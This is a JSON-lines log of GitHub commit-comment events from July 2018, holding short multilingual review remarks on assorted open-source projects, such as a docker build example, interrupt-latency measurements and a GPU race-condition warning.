{"id":"7919961187","type":"CommitCommentEvent","actor":{"login":"fredrike"},"repo":{"name":"Naesstrom/sparsnas_decoder"},"payload":{"comment":{"id":29599198,"position":8,"line":11,"path":"config.json","commit_id":"f412cf2b7f5ece554008d64e3c7ea511e029fe87","created_at":"2018-07-04T20:09:13Z","updated_at":"2018-07-04T20:09:13Z","author_association":"NONE","body":"Prova med:\r\n```json\r\n  \"run command\": 'docker build -t sparsnas --build-arg SENSORS=\"1234 1000\" --build-arg MQTT_HOST=192.168.x.x --build-arg MQTT_PORT=1883 --build-arg MQTT_USERNAME=username --build-arg MQTT_PASSWORD=password https://github.com/tubalainen/sparsnas_decoder.git',\r\n ```\r\neller: \r\n```json\r\n  \"run command\": \"docker build -t sparsnas --build-arg SENSORS=\\\"1234 1000\\\" --build-arg MQTT_HOST=192.168.x.x --build-arg MQTT_PORT=1883 --build-arg MQTT_USERNAME=username --build-arg MQTT_PASSWORD=password https://github.com/tubalainen/sparsnas_decoder.git\",\r\n```"}},"created_at":"2018-07-04T20:09:13Z"}
{"id":"7919963305","type":"CommitCommentEvent","actor":{"login":"robert-hh"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":29599200,"position":null,"line":null,"path":null,"commit_id":"14ab81e87accedfb9ed231b206dd21f3a0143404","created_at":"2018-07-04T20:10:09Z","updated_at":"2018-07-04T20:10:09Z","author_association":"CONTRIBUTOR","body":"As far as I can tell, this commit does not change however the latency of reponses to external interrupts. In a test with the actual repository i see response times of up to 2.7 ms, with the majority of responses within 200 µs.  The external pulse has a frequency of 10 Hz, at 100 µs pulse width."}},"created_at":"2018-07-04T20:10:09Z"}
{"id":"7919968592","type":"CommitCommentEvent","actor":{"login":"GottfriedSp"},"repo":{"name":"CelestiaProject/Celestia"},"payload":{"comment":{"id":29599211,"position":null,"line":null,"path":null,"commit_id":"eaaf6d4634a3719b1f34f497504e43de009e7a78","created_at":"2018-07-04T20:12:15Z","updated_at":"2018-07-04T20:12:15Z","author_association":"NONE","body":"This happens if the script load was failed (celestia:getobserver():goto() instead of celestia:getobserver():gotoobject())\r\nWithout this, the timer runns and called this function and celestia crashes.\r\nWith this check of costate == NULL, the script loading fails but celestia didn't crash anymore.\r\nNow I repaired my old script, but for other scripts it prevents celestia to crash and deactivates the script but let the timer running.\r\n\r\nI'm not so familiar with github, each Push request adds the changes here in this Pull request. Do I something wrong? I use Git GUI for windows, but with git bash  it's the same."}},"created_at":"2018-07-04T20:12:15Z"}
{"id":"7919970271","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/homework1"},"payload":{"comment":{"id":29599214,"position":26,"line":44,"path":"src/main/java/ru/otus/hm1/dao/InterviewMappingCVS.java","commit_id":"5f5d709c236f2219ac143b5d9873e60f03891949","created_at":"2018-07-04T20:12:52Z","updated_at":"2018-07-04T20:12:52Z","author_association":"NONE","body":"МОжно и так."}},"created_at":"2018-07-04T20:12:52Z"}
{"id":"7919970553","type":"CommitCommentEvent","actor":{"login":"DuckHP"},"repo":{"name":"DuckHP/warcghost"},"payload":{"comment":{"id":29599216,"position":null,"line":null,"path":null,"commit_id":"2e1f86d077cf4b10bb415ee97528feca0893e1fa","created_at":"2018-07-04T20:12:59Z","updated_at":"2018-07-04T20:12:59Z","author_association":"OWNER","body":"**DO NOT USE! THIS IS PRETTY MUCH A LINUX DESKTOP WITH VNC THAT ANYONE COULD CONNECT AND INPUT TO [AS NON-ROOT USER]**"}},"created_at":"2018-07-04T20:12:59Z"}
{"id":"7919970770","type":"CommitCommentEvent","actor":{"login":"cr6git"},"repo":{"name":"void-linux/void-packages"},"payload":{"comment":{"id":29599217,"position":null,"line":null,"path":null,"commit_id":"3c78bdcf7638c6b6b5cd20f5e4f5087803f5ff9d","created_at":"2018-07-04T20:13:03Z","updated_at":"2018-07-04T20:13:03Z","author_association":"CONTRIBUTOR","body":"@pullmoll :+1: \r\n\r\nby the way, it reminds me of... https://github.com/voidlinux/void-packages/pull/14183#issuecomment-386941682"}},"created_at":"2018-07-04T20:13:03Z"}
{"id":"7919973319","type":"CommitCommentEvent","actor":{"login":"mytestgit256"},"repo":{"name":"mytestgit256/myfirst"},"payload":{"comment":{"id":29599220,"position":5,"line":5,"path":"README.md","commit_id":"2bb9e79c915edba4aa8c6c3cd45abb088a332106","created_at":"2018-07-04T20:14:09Z","updated_at":"2018-07-04T20:14:09Z","author_association":"OWNER","body":"544нпекпуе"}},"created_at":"2018-07-04T20:14:09Z"}
{"id":"7919973335","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":29599221,"position":8,"line":791,"path":"util/start_test","commit_id":"71b07766eba924122717eb2f6335e7a33cf8fa40","created_at":"2018-07-04T20:14:09Z","updated_at":"2018-07-04T20:14:09Z","author_association":"CONTRIBUTOR","body":"Yeah, you're right, this is wrong for `CHPL_REGEXP=none` (and if re2 was speculatively built, and CHPL_RE2_VALGRIND_SUPPORT wasn't set). An improvements would be to ask chplenv if chpl_regexp is set with something like `if chpl_regexp.get() != 'none':`\r\n\r\nThere's no good way to check if valgrind was built with `CHPL_RE2_VALGRIND_SUPPORT` set, so we're effectively making it a build-time and test-time setting, hence the \"may not be\" language -- https://github.com/chapel-lang/chapel/pull/9561#discussion_r188787580\r\n\r\nWell I guess we could add some sentinel file to the install dir to mark if it was set, but I didn't know if that was worth the effort \r\n"}},"created_at":"2018-07-04T20:14:09Z"}
{"id":"7919975301","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/homework1"},"payload":{"comment":{"id":29599223,"position":19,"line":19,"path":"src/main/java/ru/otus/hm1/service/InterviewServiceImpl.java","commit_id":"5f5d709c236f2219ac143b5d9873e60f03891949","created_at":"2018-07-04T20:14:59Z","updated_at":"2018-07-04T20:14:59Z","author_association":"NONE","body":"final)"}},"created_at":"2018-07-04T20:14:59Z"}
{"id":"7919975825","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/homework1"},"payload":{"comment":{"id":29599225,"position":58,"line":67,"path":"src/main/java/ru/otus/hm1/service/InterviewServiceImpl.java","commit_id":"5f5d709c236f2219ac143b5d9873e60f03891949","created_at":"2018-07-04T20:15:14Z","updated_at":"2018-07-04T20:15:14Z","author_association":"NONE","body":"Да, именно так."}},"created_at":"2018-07-04T20:15:14Z"}
{"id":"7919980394","type":"CommitCommentEvent","actor":{"login":"Shelob9"},"repo":{"name":"CalderaWP/caldera-state"},"payload":{"comment":{"id":29599233,"position":null,"line":null,"path":null,"commit_id":"a830cec01b3b1b165a8fb87e75a8c4715bb08850","created_at":"2018-07-04T20:17:08Z","updated_at":"2018-07-04T20:17:08Z","author_association":"NONE","body":"For #2"}},"created_at":"2018-07-04T20:17:08Z"}
{"id":"7919980427","type":"CommitCommentEvent","actor":{"login":"Skrypt"},"repo":{"name":"OrchardCMS/OrchardCore"},"payload":{"comment":{"id":29599234,"position":4,"line":18,"path":"src/OrchardCore/OrchardCore.Modules/OrchardCore.Modules.csproj","commit_id":"4688108f1140cbbda7f8b86f0f3ce866289bb333","created_at":"2018-07-04T20:17:09Z","updated_at":"2018-07-04T20:17:09Z","author_association":"CONTRIBUTOR","body":"I'll fix those in the end. I'm adding references from VS while developping/debugging so that will happen 😉 "}},"created_at":"2018-07-04T20:17:09Z"}
{"id":"7919982063","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/homework1"},"payload":{"comment":{"id":29599237,"position":77,"line":82,"path":"src/main/java/ru/otus/hm1/service/InterviewServiceImpl.java","commit_id":"5f5d709c236f2219ac143b5d9873e60f03891949","created_at":"2018-07-04T20:17:51Z","updated_at":"2018-07-04T20:17:51Z","author_association":"NONE","body":"Вот почему не написать ключ подрбный?) error.message)"}},"created_at":"2018-07-04T20:17:51Z"}
{"id":"7919984060","type":"CommitCommentEvent","actor":{"login":"matthiaskoenig"},"repo":{"name":"shalinshah1993/SBSCL"},"payload":{"comment":{"id":29599240,"position":7,"line":238,"path":"pom.xml","commit_id":"24521206cabbb4058408fc389e62892db70a353c","created_at":"2018-07-04T20:18:41Z","updated_at":"2018-07-04T20:18:41Z","author_association":"COLLABORATOR","body":"I installed it in a local repository via the register maven script. The\nlocal repo is part of the listed repositories in the pom.xml\n\nOn Wed, Jul 4, 2018, 22:01 Shalin Shah <notifications@github.com> wrote:\n\n> How is maven finding this library without it being in the maven central?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/shalinshah1993/SBSCL/commit/24521206cabbb4058408fc389e62892db70a353c#commitcomment-29599174>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AA29ulFj8ktNo2_qtiDarkrt6dwdNMWVks5uDR8ogaJpZM4VC-va>\n> .\n>\n"}},"created_at":"2018-07-04T20:18:41Z"}
{"id":"7919984845","type":"CommitCommentEvent","actor":{"login":"mr-azaeldev"},"repo":{"name":"rathena/FluxCP"},"payload":{"comment":{"id":29599242,"position":4,"line":4,"path":"modules/logdata/feeding.php","commit_id":"76436664f7fdfcab1b2aa0e6170370df89928b71","created_at":"2018-07-04T20:19:02Z","updated_at":"2018-07-04T20:19:02Z","author_association":"NONE","body":"Warning: require_once(Flux/Item.php): failed to open stream: No such file or directory in C:\\AppServ\\www\\FluxCP-rA\\modules\\logdata\\feeding.php on line 4\r\n\r\nFatal error: require_once(): Failed opening required 'Flux/Item.php' (include_path='lib;.;C:\\php\\pear') in C:\\AppServ\\www\\FluxCP-rA\\modules\\logdata\\feeding.php on line 4"}},"created_at":"2018-07-04T20:19:02Z"}
{"id":"7919984867","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"DarSky24/homework1"},"payload":{"comment":{"id":29599243,"position":12,"line":10,"path":"src/main/java/ru/otus/hm1/Main.java","commit_id":"5f5d709c236f2219ac143b5d9873e60f03891949","created_at":"2018-07-04T20:19:03Z","updated_at":"2018-07-04T20:19:03Z","author_association":"NONE","body":"Всё так. Только XML-ник контекста убрать всё равно нужно)"}},"created_at":"2018-07-04T20:19:03Z"}
{"id":"7919986477","type":"CommitCommentEvent","actor":{"login":"rohithasrk"},"repo":{"name":"2stacks/django-freeradius"},"payload":{"comment":{"id":29599248,"position":65,"line":65,"path":"django_freeradius/utils.py","commit_id":"fcd2d5988d0a471febace5055ab3d3a0e3a4e1bb","created_at":"2018-07-04T20:19:44Z","updated_at":"2018-07-04T20:19:44Z","author_association":"NONE","body":"Yeah. Was actually thinking of that. Could you open a issue for this?"}},"created_at":"2018-07-04T20:19:44Z"}
{"id":"7919987803","type":"CommitCommentEvent","actor":{"login":"logonoff"},"repo":{"name":"StartNine/Start9.Host"},"payload":{"comment":{"id":29599250,"position":null,"line":null,"path":null,"commit_id":"f77216d5626a7e31ef56f8b8f23d9e33ce1d0266","created_at":"2018-07-04T20:20:18Z","updated_at":"2018-07-04T20:20:18Z","author_association":"MEMBER","body":"happy 💯th commit"}},"created_at":"2018-07-04T20:20:18Z"}
{"id":"7919988856","type":"CommitCommentEvent","actor":{"login":"psychocrypt"},"repo":{"name":"imperdin/xmr-stak"},"payload":{"comment":{"id":29599252,"position":81,"line":528,"path":"xmrstak/backend/amd/amd_gpu/opencl/cryptonight.cl","commit_id":"6a66d7e0fb02fa4965bda28bd203090f009cee41","created_at":"2018-07-04T20:20:43Z","updated_at":"2018-07-04T20:20:43Z","author_association":"NONE","body":"If you remove this barrier you have a potential race condition. Another thread from the previous iteration can still be in line 532 and read from `xin`. This is not the case on an AMD GPU because you have a wavefront size of 64 but for INTEL it can be an issue."}},"created_at":"2018-07-04T20:20:43Z"}
{"id":"7919989023","type":"CommitCommentEvent","actor":{"login":"lbalazscs"},"repo":{"name":"SWQL/Pixelitor"},"payload":{"comment":{"id":29599253,"position":null,"line":null,"path":null,"commit_id":"76a0eade25cb94d3d0f1ec22876a7260a66d5a0d","created_at":"2018-07-04T20:20:47Z","updated_at":"2018-07-04T20:20:47Z","author_association":"NONE","body":"Hi, note that if you want to contribute to the com.bric packages, you should contribute to this project, because this is the newest: https://github.com/mickleness/pumpernickel\r\nPixelitor uses an older version (I plan to upgrade some time, but it's not a priority)"}},"created_at":"2018-07-04T20:20:47Z"}
{"id":"7919990228","type":"CommitCommentEvent","actor":{"login":"francitato"},"repo":{"name":"twy2004/ArianoxxKernel"},"payload":{"comment":{"id":29599255,"position":null,"line":null,"path":null,"commit_id":"51601d920f3831e5bc764f13da29e622d9c113b4","created_at":"2018-07-04T20:21:19Z","updated_at":"2018-07-04T20:21:19Z","author_association":"NONE","body":"Bro, are u on telegram? I really like your job, maybe u can help me with a things"}},"created_at":"2018-07-04T20:21:19Z"}
{"id":"7919990448","type":"CommitCommentEvent","actor":{"login":"thesecretmaster"},"repo":{"name":"Charcoal-SE/metasmoke"},"payload":{"comment":{"id":29599256,"position":9,"line":14,"path":"app/views/rss/autoflagged.rss.builder","commit_id":"1a90efeca853e09198a54b5a2f59d3f57ebef65a","created_at":"2018-07-04T20:21:25Z","updated_at":"2018-07-04T20:21:25Z","author_association":"MEMBER","body":"OK, but can we just deploy this for testing?"}},"created_at":"2018-07-04T20:21:25Z"}
{"id":"7919990664","type":"CommitCommentEvent","actor":{"login":"yuhhaurlin"},"repo":{"name":"kaloz/mwlwifi"},"payload":{"comment":{"id":29599258,"position":null,"line":null,"path":null,"commit_id":"d9daa1dfd418a0a790188b805c95c99dea23f1bb","created_at":"2018-07-04T20:21:31Z","updated_at":"2018-07-04T20:21:31Z","author_association":"COLLABORATOR","body":"Thanks. I will check it."}},"created_at":"2018-07-04T20:21:31Z"}
{"id":"7919991811","type":"CommitCommentEvent","actor":{"login":"sidey79"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29599261,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-04T20:22:02Z","updated_at":"2018-07-04T20:22:02Z","author_association":"CONTRIBUTOR","body":"Das Restrisiko tritt nur ein, wenn nicht konforme Daten übergeben werden oder im Speicher selbst ein Fehler auftritt.\r\nDas Repeat <20 wäre somit nicht notwendig.\r\n\r\nMan kanns aber auch gleich so lösen, dass die Schleife nur durchlaufen wird, solange die Startposition + mindestlänge des Protokolles <= Endeposition ist."}},"created_at":"2018-07-04T20:22:02Z"}
{"id":"7920011802","type":"CommitCommentEvent","actor":{"login":"Ciborg-Ascend"},"repo":{"name":"Ciborg-Ascend/Trivia-mec"},"payload":{"comment":{"id":29599310,"position":null,"line":null,"path":null,"commit_id":"b91a270d285d21533822f0cc79798261d2be0d0c","created_at":"2018-07-04T20:30:17Z","updated_at":"2018-07-04T20:30:17Z","author_association":"OWNER","body":"Ya esta actualizado el repo en github\n\nEl mié., 4 jul. 2018 1:04 p. m., clsnxo <notifications@github.com> escribió:\n\n> hola, puedes facilitar el modelo de base de datos o el schema.sql listo.\n>\n> saludos\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ciborg-Ascend/Trivia-mec/commit/b91a270d285d21533822f0cc79798261d2be0d0c#commitcomment-29598856>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ASZWyUzf-ZZVAvW4JVGdb5RoCJ36AHp2ks5uDRG4gaJpZM4VC8ex>\n> .\n>\n"}},"created_at":"2018-07-04T20:30:17Z"}
{"id":"7920013193","type":"CommitCommentEvent","actor":{"login":"tonit"},"repo":{"name":"apache/aries-jax-rs-whiteboard"},"payload":{"comment":{"id":29599315,"position":null,"line":null,"path":null,"commit_id":"a6ba7b98778c639e654266ddbb276f5981b1bea8","created_at":"2018-07-04T20:30:51Z","updated_at":"2018-07-04T20:30:51Z","author_association":"NONE","body":"Actually, it might not this particular commit as you really don't want to do jaxb deps into the common whiteboard, but i did not follow the recent changes and somehow jaxb support depends on cxf stuff which was embedded before. \r\nNow, funny thing, for integration tests, you create a very custom fragment (jax-rs.itests-fragment) including the problematic cxf dependencies. But it is not part of the 1.0.0 release. So am looking at an oversight from you guys or am I holding it wrong?\r\n"}},"created_at":"2018-07-04T20:30:51Z"}
{"id":"7920015382","type":"CommitCommentEvent","actor":{"login":"hareeshganesan"},"repo":{"name":"blattus/stock-summary"},"payload":{"comment":{"id":29599321,"position":null,"line":null,"path":null,"commit_id":"b002acd5efbf485dc6be119b76a5b1d983d19d3a","created_at":"2018-07-04T20:31:45Z","updated_at":"2018-07-04T20:31:45Z","author_association":"CONTRIBUTOR","body":"good call. python 3 changed maps to an enumerable non-list object. always messes with me."}},"created_at":"2018-07-04T20:31:45Z"}
{"id":"7920015955","type":"CommitCommentEvent","actor":{"login":"shreyasthiagaraj"},"repo":{"name":"blockstack/blockstack-ios"},"payload":{"comment":{"id":29599322,"position":26,"line":102,"path":"Blockstack/Classes/Blockstack.swift","commit_id":"734ed8ff5546ed59ff2baebc7b854818665f04c6","created_at":"2018-07-04T20:32:00Z","updated_at":"2018-07-04T20:32:00Z","author_association":"COLLABORATOR","body":"@yknl What do you think of this? Do SFSafariViewController and SFAuthenticationSession share cookies, and if so would it be better to show SFSafariViewController via a presenter that is passed in as an argument? The downside of this method here is that you currently see the same system alert as you do when you try to sign in.\r\n\r\nAlso, you mentioned that the redirect uri needs to be passed in as a parameter (i.e. \"myblockstackapp://\"). Did you mean it needs to be a query parameter in the url that this sfauthentactionsession navigates to? Or should we modify \"redirect.html\" to handle it there?"}},"created_at":"2018-07-04T20:32:00Z"}
{"id":"7920016670","type":"CommitCommentEvent","actor":{"login":"shreyasthiagaraj"},"repo":{"name":"blockstack/blockstack-ios"},"payload":{"comment":{"id":29599327,"position":25,"line":101,"path":"Blockstack/Classes/Blockstack.swift","commit_id":"734ed8ff5546ed59ff2baebc7b854818665f04c6","created_at":"2018-07-04T20:32:18Z","updated_at":"2018-07-04T20:32:18Z","author_association":"COLLABORATOR","body":"@yknl What do you think of this? Do SFSafariViewController and SFAuthenticationSession share cookies, and if so would it be better to show SFSafariViewController via a presenter that is passed in as an argument? The downside of this method here is that you currently see the same system alert as you do when you try to sign in.\r\n\r\nAlso, you mentioned that the redirect uri needs to be passed in as a parameter (i.e. \"myblockstackapp://\"). Did you mean it needs to be a query parameter in the url that this sfauthentactionsession navigates to? Or should we modify \"redirect.html\" to handle it there?"}},"created_at":"2018-07-04T20:32:18Z"}
{"id":"7920022518","type":"CommitCommentEvent","actor":{"login":"shreyasthiagaraj"},"repo":{"name":"blockstack/blockstack-ios"},"payload":{"comment":{"id":29599339,"position":31,"line":72,"path":"Example/Blockstack/ViewController.swift","commit_id":"734ed8ff5546ed59ff2baebc7b854818665f04c6","created_at":"2018-07-04T20:34:55Z","updated_at":"2018-07-04T20:34:55Z","author_association":"COLLABORATOR","body":"Follow up to my previous question on whether this should pass in redirect.html or the app redirect uri directly, which would be included as a query parameter to https://browser.blockstack.org/clear-auth"}},"created_at":"2018-07-04T20:34:55Z"}
{"id":"7920022676","type":"CommitCommentEvent","actor":{"login":"aki54"},"repo":{"name":"aki54/ciao-mondo"},"payload":{"comment":{"id":29599340,"position":null,"line":null,"path":null,"commit_id":"5f25eecd21440ecfb7d6fa93cbc443c2536e1980","created_at":"2018-07-04T20:34:59Z","updated_at":"2018-07-04T20:34:59Z","author_association":"OWNER","body":"COMMENTO A ME STESSO"}},"created_at":"2018-07-04T20:34:59Z"}
{"id":"7920024583","type":"CommitCommentEvent","actor":{"login":"surgerer"},"repo":{"name":"surgerer/test"},"payload":{"comment":{"id":29599344,"position":25,"line":47,"path":"Test2.js","commit_id":"68dc98481c781f10f9e2be8b5681036bf99d9f3d","created_at":"2018-07-04T20:35:49Z","updated_at":"2018-07-04T20:35:49Z","author_association":"OWNER","body":"blame comment"}},"created_at":"2018-07-04T20:35:49Z"}
{"id":"7920026158","type":"CommitCommentEvent","actor":{"login":"surgerer"},"repo":{"name":"surgerer/test"},"payload":{"comment":{"id":29599345,"position":18,"line":39,"path":"Test2.js","commit_id":"68dc98481c781f10f9e2be8b5681036bf99d9f3d","created_at":"2018-07-04T20:36:30Z","updated_at":"2018-07-04T20:36:30Z","author_association":"OWNER","body":"loadcss comment"}},"created_at":"2018-07-04T20:36:30Z"}
{"id":"7920026665","type":"CommitCommentEvent","actor":{"login":"apa420"},"repo":{"name":"apa420/chatterino2"},"payload":{"comment":{"id":29599346,"position":null,"line":null,"path":null,"commit_id":"0f6b76639a3c6a1b20f18894e3d6b21f4ea7ead6","created_at":"2018-07-04T20:36:42Z","updated_at":"2018-07-04T20:36:42Z","author_association":"OWNER","body":"Not implemented: full link on hover\r\nThis fixes some issues when the file-url is too long and messes up the width of the settings window."}},"created_at":"2018-07-04T20:36:42Z"}
{"id":"7920028222","type":"CommitCommentEvent","actor":{"login":"kevinbarabash"},"repo":{"name":"Khan/KaTeX"},"payload":{"comment":{"id":29599350,"position":151,"line":149,"path":"test/helpers.js","commit_id":"b3dcf40b9025b25041d7561f4b1a6d8f07c42c0f","created_at":"2018-07-04T20:37:21Z","updated_at":"2018-07-04T20:37:21Z","author_association":"MEMBER","body":"I'll try reviewing the final changes and see how that goes."}},"created_at":"2018-07-04T20:37:21Z"}
{"id":"7920032373","type":"CommitCommentEvent","actor":{"login":"AndyOchoaS"},"repo":{"name":"Automattic/mongoose"},"payload":{"comment":{"id":29599358,"position":null,"line":null,"path":null,"commit_id":"727eda48bcecfb8f4462162863e7beb7bca18fdb","created_at":"2018-07-04T20:39:13Z","updated_at":"2018-07-04T20:39:13Z","author_association":"NONE","body":"Sorry, the problem was solved. https://github.com/Automattic/mongoose/issues/6659"}},"created_at":"2018-07-04T20:39:13Z"}
{"id":"7920034156","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29599366,"position":null,"line":null,"path":null,"commit_id":"d7ac5474dd0582be35e2290d95f5fe610aee2963","created_at":"2018-07-04T20:40:03Z","updated_at":"2018-07-04T20:40:03Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/3/display/redirect) (on internal Jenkins) failed in stage 'Publish builds to GitHub' 🔥 : java.lang.Exception: Skipping the rest for now\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/jenkins-device-tests/3//console)\n"}},"created_at":"2018-07-04T20:40:03Z"}
{"id":"7920034979","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/skipper-adapter-tests"},"payload":{"comment":{"id":29599370,"position":null,"line":null,"path":null,"commit_id":"86fa8405d5a5def9ffce6072c67f1af806070f43","created_at":"2018-07-04T20:40:25Z","updated_at":"2018-07-04T20:40:25Z","author_association":"MEMBER","body":"see https://github.com/balderdashy/skipper-adapter-tests/commit/d4c4de025dae0807995d38371479bc44786664eb"}},"created_at":"2018-07-04T20:40:25Z"}
{"id":"7920036074","type":"CommitCommentEvent","actor":{"login":"checkraiser"},"repo":{"name":"facebook/react"},"payload":{"comment":{"id":29599371,"position":null,"line":null,"path":null,"commit_id":"313611572b6567d229367ed20ff63d1bca8610bb","created_at":"2018-07-04T20:40:53Z","updated_at":"2018-07-04T20:40:53Z","author_association":"NONE","body":"Good song !"}},"created_at":"2018-07-04T20:40:53Z"}
{"id":"7920036701","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29599373,"position":157,"line":850,"path":"src/test/java/org/jenkinsci/plugins/gitclient/GitAPITestCase.java","commit_id":"efdcd2ac24ff3c8036aae53bff2969822712ff39","created_at":"2018-07-04T20:41:10Z","updated_at":"2018-07-04T20:41:10Z","author_association":"NONE","body":"Hi @MarkEWaite, this test (and other ones) fails with cli git 2.14.1 on my machine with the current master (0ef4d20d057714bc5da618793b1c0c1c7bc9258e) as follows:\r\n\r\n`[ERROR]   CliGitAPIImplTest.runTest:50->GitAPITestCase.test_fetch_with_prune:1334->GitAPITestCase.assertBranchesExist:473 origin/branch1 branch not found in [origin/branch2, origin/HEAD, origin/master]`\r\n\r\nWhich cli git version is running on https://ci.jenkins.io/job/Plugins/job/git-client-plugin/job/master/ or how can I find out?"}},"created_at":"2018-07-04T20:41:10Z"}
{"id":"7920037863","type":"CommitCommentEvent","actor":{"login":"fairlycasual"},"repo":{"name":"fairlycasual/roundup-app"},"payload":{"comment":{"id":29599376,"position":null,"line":null,"path":null,"commit_id":"69d4026ee0c7d384b3bdb4fea65959ec0bb16740","created_at":"2018-07-04T20:41:41Z","updated_at":"2018-07-04T20:41:41Z","author_association":"OWNER","body":"frontend components implemented w/o plaid"}},"created_at":"2018-07-04T20:41:41Z"}
{"id":"7920038053","type":"CommitCommentEvent","actor":{"login":"CmdrFop"},"repo":{"name":"CmdrFop/Robotics"},"payload":{"comment":{"id":29599378,"position":2,"line":2,"path":"Main.java","commit_id":"a35c2e3539122033afa5892157ddead436acd84b","created_at":"2018-07-04T20:41:46Z","updated_at":"2018-07-04T20:41:46Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-04T20:41:46Z"}
{"id":"7920043439","type":"CommitCommentEvent","actor":{"login":"dagochen"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29599389,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-04T20:44:09Z","updated_at":"2018-07-04T20:44:09Z","author_association":"CONTRIBUTOR","body":"so the name SPELL_AURA_MOD_CASTING_SPEED_NOT_STACK is wrong? :)"}},"created_at":"2018-07-04T20:44:09Z"}
{"id":"7920045696","type":"CommitCommentEvent","actor":{"login":"sunke5616"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29599396,"position":null,"line":null,"path":null,"commit_id":"4f7447f08104706c537e4fd119dfa4a0afa3b799","created_at":"2018-07-04T20:45:07Z","updated_at":"2018-07-04T20:45:07Z","author_association":"NONE","body":"兄弟，你好，我英文不好，所以我打中文了。希望你能看懂。\r\n谢谢你无私的一直分享和升级宏"}},"created_at":"2018-07-04T20:45:07Z"}
{"id":"7920047980","type":"CommitCommentEvent","actor":{"login":"Vierwood"},"repo":{"name":"Altemio/SevenKingdoms-master"},"payload":{"comment":{"id":29599403,"position":null,"line":null,"path":null,"commit_id":"cb65fad51bc1c5b20256a3251bea26c3ae22c73c","created_at":"2018-07-04T20:46:03Z","updated_at":"2018-07-04T20:46:03Z","author_association":"COLLABORATOR","body":"I already did :D"}},"created_at":"2018-07-04T20:46:03Z"}
{"id":"7920049880","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29599406,"position":78,"line":78,"path":"tests/qgraph/qsdhci.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-04T20:46:50Z","updated_at":"2018-07-04T20:46:50Z","author_association":"OWNER","body":"@bonzini question: I am actually wondering why \"pci-device\" is here. sdhci-pci does not produce any pci-device, it consumes, but that should not be the scope of this function."}},"created_at":"2018-07-04T20:46:50Z"}
{"id":"7920053786","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"TheSerapher/php-syncbase"},"payload":{"comment":{"id":29599412,"position":null,"line":null,"path":null,"commit_id":"10cfcf4d80f92b3b97043a0d7ea4214ddacc51a7","created_at":"2018-07-04T20:48:31Z","updated_at":"2018-07-04T20:48:31Z","author_association":"NONE","body":"10cfcf4"}},"created_at":"2018-07-04T20:48:31Z"}
{"id":"7920053854","type":"CommitCommentEvent","actor":{"login":"sri607"},"repo":{"name":"sri607/hello-world"},"payload":{"comment":{"id":29599413,"position":null,"line":null,"path":null,"commit_id":"be3100f68e9530a7e78b6453344d5e515a3a3adc","created_at":"2018-07-04T20:48:33Z","updated_at":"2018-07-04T20:48:33Z","author_association":"OWNER","body":"adadf"}},"created_at":"2018-07-04T20:48:33Z"}
{"id":"7920055281","type":"CommitCommentEvent","actor":{"login":"Amid198"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":29599414,"position":null,"line":null,"path":null,"commit_id":"5c01d99c12876263d8cc700a11cce9ad88994096","created_at":"2018-07-04T20:49:13Z","updated_at":"2018-07-04T20:49:13Z","author_association":"NONE","body":"\r\n[Knowledgebase _ WHMCS.pdf](https://github.com/python/cpython/files/2164291/Knowledgebase._.WHMCS.pdf)\r\n"}},"created_at":"2018-07-04T20:49:13Z"}
{"id":"7920057443","type":"CommitCommentEvent","actor":{"login":"dead10ck"},"repo":{"name":"kovidgoyal/kitty"},"payload":{"comment":{"id":29599416,"position":null,"line":null,"path":null,"commit_id":"2b0d8bfe461ff8430cc86ee8d51ddc14adf95e23","created_at":"2018-07-04T20:50:08Z","updated_at":"2018-07-04T20:50:08Z","author_association":"NONE","body":"Why was this deleted? This was very helpful for getting started."}},"created_at":"2018-07-04T20:50:08Z"}
{"id":"7920058115","type":"CommitCommentEvent","actor":{"login":"Hamadalnamazi"},"repo":{"name":"Hamadalnamazi/hello-world"},"payload":{"comment":{"id":29599419,"position":null,"line":null,"path":null,"commit_id":"fe69b4f8128e31de3a6efd4048204d0fc1502ff2","created_at":"2018-07-04T20:50:22Z","updated_at":"2018-07-04T20:50:22Z","author_association":"OWNER","body":"z"}},"created_at":"2018-07-04T20:50:22Z"}
